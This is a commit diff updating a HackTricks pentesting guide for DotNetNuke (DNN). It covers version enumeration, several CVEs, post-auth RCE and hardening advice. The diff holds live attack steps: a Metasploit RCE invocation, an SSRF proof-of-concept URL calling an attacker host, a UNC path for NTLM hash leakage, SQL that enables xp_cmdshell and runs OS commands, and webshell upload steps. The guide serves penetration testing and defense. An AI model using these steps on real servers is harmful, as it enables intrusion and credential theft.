Merge pull request #1146 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_dotnetnuke-dnn_20250717_162435

Research Update Enhanced src/network-services-pentesting/pen...

Author: carlospolop

src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md

@@ -4,44 +4,97 @@
 
 ## DotNetNuke (DNN)
 
-If you enter as **administrator** in DNN it's easy to obtain RCE.
+If you enter as **administrator** in DNN it's easy to obtain **RCE**, however a number of *unauthenticated* and *post-auth* techniques have been published in the last few years.  The following cheat-sheet collects the most useful primitives for both offensive and defensive work.
 
-## RCE
+---
+## Version & Environment Enumeration
 
-### Via SQL
+* Check the *X-DNN* HTTP response header – it usually discloses the exact platform version.
+* The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs).
+* `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `"dnnVersion"` for low-privilege users.
+* Typical cookies you will see on a live instance:
+  * `.DOTNETNUKE` – ASP.NET forms authentication ticket.
+  * `DNNPersonalization` – contains XML/serialized user profile data (old versions – see RCE below).
 
-A SQL console is accessible under the **`Settings`** page where you can enable **`xp_cmdshell`** and **run operating system commands**.
+---
+## Unauthenticated Exploitation
 
-Use these lines to enable **`xp_cmdshell`**:
+### 1. Cookie Deserialization RCE  (CVE-2017-9822 & follow-ups)
+*Affected versions ≤ 9.3.0-RC*
+
+`DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled.  Crafted XML can therefore lead to arbitrary gadget chains and code execution.
 
-```sql
-EXEC sp_configure 'show advanced options', '1'
-RECONFIGURE
-EXEC sp_configure 'xp_cmdshell', '1'
-RECONFIGURE
 ```
+msf> use exploit/windows/http/dnn_cookie_deserialization_rce
+msf> set RHOSTS <target>
+msf> set LHOST  <attacker_ip>
+msf> run
+```
+The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326).  Exploitation works **without authentication** on 7.x–9.1.x and with a *verified* low-privilege account on 9.2.x+.
 
-And press **"Run Script"** to run that sQL sentences.
+### 2. Server-Side Request Forgery  (CVE-2025-32372)
+*Affected versions < 9.13.8  –  Patch released April 2025*
 
-Then, use something like the following to run OS commands:
+A bypass of the older `DnnImageHandler` fix enables an attacker to coerce the server to issue **arbitrary GET requests** (semi-blind SSRF).  Practical impacts:
 
-```sql
-xp_cmdshell 'whoami'
+* Internal port scan / metadata service discovery in cloud deployments.
+* Reach hosts otherwise firewalled from the Internet.
+
+Proof-of-concept (replace `TARGET` & `ATTACKER`):
+```
+https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
 ```
+The request is triggered in the background; monitor your listener for callbacks.
 
-### Via ASP webshell
+### 3. NTLM Hash Exposure via UNC Redirect  (CVE-2025-52488)
+*Affected versions 6.0.0 – 9.x (< 10.0.1)*
 
-In `Settings -> Security -> More -> More Security Settings` you can **add new allowed extensions** under `Allowable File Extensions`, and then clicking the `Save` button.
+Specially crafted content can make DNN attempt to fetch a resource using a **UNC path** such as `\\attacker\share\img.png`.  Windows will happily perform NTLM negotiation, leaking the server-account hashes to the attacker.  Upgrade to **10.0.1** or disable outbound SMB at the firewall.
 
-Add **`asp`** or **`aspx`** and then in **`/admin/file-management`** upload an **asp webshell** called `shell.asp` for example.
+### 4. IP Filter Bypass  (CVE-2025-52487)
+If administrators rely on *Host/IP Filters* for admin portal protection, be aware that versions prior to **10.0.1** can be bypassed by manipulating `X-Forwarded-For` in a reverse-proxy scenario.
 
-Then access to **`/Portals/0/shell.asp`** to access your webshell.
+---
+## Post-Authentication to RCE
 
-### Privilege Escalation
+### Via SQL console
+Under **`Settings → SQL`** a built-in query window allows execution against the site database.  On Microsoft SQL Server you can enable **`xp_cmdshell`** and spawn commands:
 
-You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example.
+```sql
+EXEC sp_configure 'show advanced options', 1;
+RECONFIGURE;
+EXEC sp_configure 'xp_cmdshell', 1;
+RECONFIGURE;
+GO
+xp_cmdshell 'whoami';
+```
 
-{{#include ../../banners/hacktricks-training.md}}
+### Via ASPX webshell upload
+1. Go to **`Settings → Security → More → More Security Settings`**.
+2. Append `aspx` (or `asp`) to **Allowable File Extensions** and **Save**.
+3. Browse to **`/admin/file-management`** and upload `shell.aspx`.
+4. Trigger it at **`/Portals/0/shell.aspx`**.
+
+---
+## Privilege Escalation on Windows
+Once code execution is achieved as **IIS AppPool\<Site>**, common Windows privilege-escalation techniques apply.  If the box is vulnerable you can leverage:
+
+* **PrintSpoofer** / **SpoolFool** to abuse *SeImpersonatePrivilege*.
+* **Juicy/Sharp Potatoes** to escape *Service Accounts*.
+
+---
+## Hardening Recommendations (Blue Team)
 
+* **Upgrade** to at least **9.13.9** (fixes SSRF bypass) or preferably **10.0.1** (IP filter & NTLM issues).
+* Remove residual **`InstallWizard.aspx*`** files after installation.
+* Disable outbound SMB (ports 445/139) egress.
+* Enforce strong *Host Filters* on the edge proxy rather than within DNN.
+* Block access to `/API/RemoteContentProxy` if unused.
 
 
+
+## References
+
+* Metasploit `dnn_cookie_deserialization_rce` module documentation – practical unauthenticated RCE details (GitHub).
+* GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF bypass & patch information.
+{{#include ../../banners/hacktricks-training.md}}